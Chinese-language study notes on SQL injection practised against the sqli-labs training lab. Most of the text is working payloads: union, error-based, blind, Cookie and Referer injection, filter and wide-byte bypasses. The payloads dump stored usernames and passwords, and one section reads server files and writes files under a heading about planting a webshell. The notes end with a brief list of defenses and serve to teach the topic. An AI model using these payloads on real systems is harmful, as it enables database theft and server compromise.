SQL注入学习记录

分类

按照请求方法分类：GET、POST

按照SQL数据类型分类：整型注入、字符型注入

其他的数据类型：报错注入、双注入（用到了两个SELECT）、

时间盲注、Cookie注入、User-Agent注入

【盲注】：时间盲注、布尔盲注

注入方法 1、判断是否有注入（判断是否未严格校验）-->第一要素

1）可控参数的改变能否影响页面的显示结果

2）输入的SQL语句是否能报错---能通过数据库的报错，看到数据库的一些语句痕迹

（select username,password form user where id='?'#‘limit 0,1）

3）输入的SQL语句能否不报错---我们的语句能成功闭合

?id=1

2、什么类型的注入 3、语句是否能被恶意修改-->第二个要素 4、是否能成功执行-->第三个要素 5、获取想要的数据

数据库->表->字段->值

information_schema,challenges,mysql,performance_schema,security,sys

emails,referers,uagents,users

#查询有几列：1，2，3只是起到一个占位的作用
http://localhost/sqli-labs/Less-2/?id=4 union select 1,2,3 %23

---------------------------------------------------------------------------------------------------------------------------------

整型注入

http://localhost/sqli-labs/Less-2/?id=-1 union select 1,2,3 %23
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,user(),3 from information_schema.schemata %23
#查询所有数据库
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata %23
#查询当前数据库
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,database(),3 from information_schema.schemata %23
#查询当前数据库中的所有表
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
#查询当前表中的所有字段
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' %23
#查询当前字段中的所有数据
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(concat_ws('——',username,password)),3 from security.users %23 

字符型注入（单引号，双引号，括号）

http://localhost/sqli-labs/Less-1/?id=1' %23
http://localhost/sqli-labs/Less-1/?id=1'  order by 3 %23
http://localhost/sqli-labs/Less-1/?id=-1'  union select 1,2,3 %23
http://localhost/sqli-labs/Less-1/?id=-1'  union select 1,database(),3 %23
http://localhost/sqli-labs/Less-1/?id=-1'  union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-labs/Less-1/?id=-1'  union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()  and table_name='users' %23
http://localhost/sqli-labs/Less-1/?id=-1'  union select 1,group_concat(concat_ws('——',id,username,password)),3 from security.users %23

http://localhost/sqli-labs/Less-4/?id=1" ) %23
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,database(),3 from information_schema.schemata %23
http://localhost/sqli-labs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23
http://localhost/sqli-labs/Less-4/?id=-1" ) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users' %23
http://localhost/sqli-labs/Less-4/?id=-1" ) union select 1,group_concat(concat_ws('——',username,password)),3 from security.users %23

POST注入（登录框）

将登录框内的语句闭合即可
用BP抓包并用repeater修改、发送

报错注入

函数解释：
	extractvalue();从目标XML中返回包含所查询值的字符串
	EXTRACTVALUE（XML_document,XPath_string）;
	第一个参数：XML_document是string格式，为XML文档对象的名称，文中为DOc
	第二个参数：XPath-string（Xpath格式的字符串）
	concat：返回结果为连接参数产生的字符串
	
	UPDATEXML（XML_document,Xpath_string,new_value）;
	第一个参数：XML_document是string格式，为XML文档对象的名称，文中为DOc
	第二个参数：XPath_string(Xpath格式的字符串)，如果不了解Xpath语法，可以在网上查找数据
	第三个参数：new_value,string格式，替换查找到符合条件的数据
uname=' union select 1,extractvalue(1,concat(0x7e,(select version()))) %23&passwd=admin&submit=Submit
uname=' union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ) ) )  %23&passwd=admin&submit=Submit
uname=' union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()) ),1 )  %23&passwd=admin&submit=Submit

双注入（前台不能回显，要靠报错来得到数据库信息）

uname=admin' union select 1,count(1) from information_schema.tables group by floor(rand()*2) %23&passwd=12345&submit=Submit	
（count（1）是统计行数，rand（）*2不是0就是1，group by 是进行分组）
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),version()) %23&passwd=12345&submit=Submit
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1)) %23&passwd=12345&submit=Submit
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)) %23&passwd=12345&submit=Submit
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select username from security.users  limit 0,1))  %23&passwd=12345&submit=Submit
#也可以直接用users
uname=admin' union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select username from users  limit 0,1))  %23&passwd=12345&submit=Submit

布尔盲注

http://localhost/sqli-labs/Less-5/?id=-1' or (select substr(version(),1,1) = 'a') %23
http://localhost/sqli-labs/Less-5/?id=-1' or (select substr(version(),1,1) = '5') %23
http://localhost/sqli-labs/Less-5/?id=-1' or (select 1 from information_schema.tables where table_schema =database() and substr(table_name,1,1)='a' limit 0,1) %23
http://localhost/sqli-labs/Less-5/?id=-1' or (select 1 from information_schema.tables where table_schema =database() and substr(table_name,1,1)='u' limit 0,1) %23
http://localhost/sqli-labs/Less-5/?id=-1' or (select ascii(substr(table_name,2,1)) from information_schema.tables where table_schema =database() limit 0,1) =109 %23
#用BP抓包，发送到intruder对ASCII码进行爆破

时间盲注

http://localhost/sqli-labs/Less-9/?id=1' or if((select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema =database() limit 0,1)=101,sleep(2),0) %23

Cookie注入

Cookie: uname=admin' and 0 union select 1,2,3 %23
Cookie: uname=admin' and 0 union select 1,group_concat(table_name),3  from information_schema.tables where table_schema =database() %23
Cookie: uname=admin' and 0 union select 1,group_concat(column_name),3  from information_schema.columns where table_schema =database() and table_name='users' %23
Cookie: uname=admin' and 0 union select 1,group_concat(concat_ws(":",username,password)),3  from users  %23

HTTP-Referer注入

insert into xxx(a,b,c)values('' and extractvalue(1,concat(0x7e,@@version)) and ''','')
Referer: http://localhost/sqli-labs/Less-19/' and extractvalue(1,concat(0x7e,@@version)) and '
insert into xxx(a,b,c)values('' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1))) and '','')
' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema = database() limit 0,1))) and '
' and extractvalue(1,concat(0x7e,(select group_concat(id) from emails ))) and '

通过SQL注入读写文件

Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。
使用条件：
A、必须有权限读取并且文件必须完全可读
B、欲读取文件必须在服务器上
C、必须指定文件完整的路径                             
D、欲读取文件必须小于 max_allowed_packet
                             
http://localhost/sqli-labs/Less-1/?id=1'  order by 3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3 %23
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,load_file("index.php"),3 %23                             
http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,load_file("d://boot.ini") %23                           http://localhost/sqli-labs/Less-1/index.php/?id=-1' union select 1,2,load_file("D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-1\\index.php") %23
#获取源码
http://localhost/sqli-labs/Less-1/index.php/?id=-1' union select 1,2,hex(load_file("D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\index.php")) %23                               
http://localhost/sqli-labs/Less-7/?id=1')) order by 3 %23
http://localhost/sqli-labs/Less-7/?id=1')) union select 1,2,3 into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\a.txt"  %23
#写入木马                             
http://localhost/sqli-labs/Less-7/?id=1')) union select 1,2,""  into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\a.txt" %23  

#绕过注释符过滤

select * from xx where id=''='' limit 0,1
http://localhost/sqli-labs/Less-23/?id=1'='
http://localhost/sqli-labs/Less-23/?id=1' or (extractvalue(1,concat(0x7e,version()))) or ' 
http://localhost/sqli-labs/Less-23/?id=1' or (extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)))) or ' 
http://localhost/sqli-labs/Less-23/?id=-1' union select 1,version(),'

绕过and-or字符过滤

http://localhost/sqli-labs/Less-25/?id=-1' union select 1,user(),3 %23
http://localhost/sqli-labs/Less-25/?id=-1' || 1%23
http://localhost/sqli-labs/Less-25/?id=-1' || (extractvalue(1,concat(0x7e,version()))) %23

绕过空格注入

%09	tab键
%0a	新建一行
%0c 新的一页
%0d retuen 功能
%0b tab键（垂直）
%a0 空格
/**/ 代替空格
http://localhost/sqli-labs/Less-26/?id=1' || (select%a01) || '

内联注释绕过

http://localhost/sqli-labs/Less-27/?id=1'%a0or%a01=1%a0or '
#更改大小写
http://localhost/sqli-labs/Less-27/?id=1'%a0UniOn%a0SelEct%a01,2'
#过滤关键字（可能有多次）
http://localhost/sqli-labs/Less-27/?id=1'%a0ununionion%a0seselectlect%a01,2'
#内联注释
http://localhost/sqli-labs/Less-27/?id=1'%a0/*!union*/%a0//**!SElect*/%a01,2'

宽字节注入

GBK编码 835c

http://localhost/sqli-labs/Less-32/?id=1%81' %23
http://localhost/sqli-labs/Less-32/?id=-1%81' union select 1,version(),3%23
http://localhost/sqli-labs/Less-32/?id=-1%81' union select 1,user(),3%23

过滤函数绕过（综合）

uname='=(select(1)from(admin)where(substr((passwd)from(30)))='cf')='&passwd=admin
#用BP对字符串中的字符一个个爆破

SQL注入防御手段 代码层：

黑名单

白名单

敏感字符过滤

使用框架安全查询

规范输出

配置层

开启GPC

使用UTF-8

物理层

WAF

数据库审计

云防护

IPS（入侵防御系统）